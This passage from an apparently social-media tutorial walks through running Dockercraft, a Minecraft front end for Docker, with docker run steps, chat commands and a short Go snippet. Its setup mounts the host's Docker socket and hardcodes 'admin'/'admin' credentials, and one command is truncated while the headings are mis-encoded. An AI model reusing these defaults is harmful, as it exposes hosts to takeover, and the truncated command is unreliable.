4) -v /var/run/docker.sock:/var/run/docker.sock \

5) --name dockercraft \

6) gaetan/dockercraft

7) Mounting /var/run/docker.sock inside the container is necessary to send requests to the Docker remote API.

8) Open Minecraft > Multiplayer > Add Server

> The server address is the IP of Docker host. No need to specify a port if you used the default one.

>If you're using Docker Machine: docker-machine ip <machine_name>

9) Join Server!

><You should see at least one container in your world, which is the one hosting your Dockercraft server.

>You can start, stop and remove containers interacting with levers and buttons. Some Docker commands are also supported directly via Minecraft's chat window, which is displayed by pressing the T key (default) or / key.

10) A command always starts with a /.

> If you open the prompt using the / key, it will be prefilled with a / character, but if you open it with the T key, it will not be prefilled and you will have to type a / yourself before typing your docker command.

example: /docker run redis

๐Ÿฆ‘๐˜พ๐™ช๐™จ๐™ฉ๐™ค๐™ข๐™ž๐™ฏ๐™ž๐™ฃ๐™œ ๐˜ฟ๐™ค๐™˜๐™ ๐™š๐™ง๐™˜๐™ง๐™–๐™›๐™ฉ:

11) You can pass these additional arguments to your docker run command:

> docker run -t -i -d -p 25565:25565 \

> -v /var/run/docker.sock:/var/run/docker.sock \

> --name dockercraf

>gaetan/dockercraft <biome> <groundlevel> <sealevel> <finishers>

๐Ÿฆ‘๐”พ๐• ๐•ก๐•ฃ๐• ๐•ฉ๐•ช:

12) Events from the Docker remote API are transmitted to the Lua plugin by a small daemon (written in Go). (go/src/goproxy)

> func MCServerRequest(data url.Values, client *http.Client) {
req, _ := http.NewRequest("POST", "http://127.0.0.1:8080/webadmin/Docker/Docker", strings.NewReader(data.Encode()))
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.SetBasicAuth("admin", "admin")
client.Do(req)

๐“ฆ๐“ป๐“ฒ๐“ฝ๐“ฝ๐“ฎ๐“ท ๐“ซ๐”‚ ๐“œ๐“ป. ๐“‘๐“ธ๐“ฝ๐“๐“ฎ๐“ฝ (๐“ฝ.๐“ถ.)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -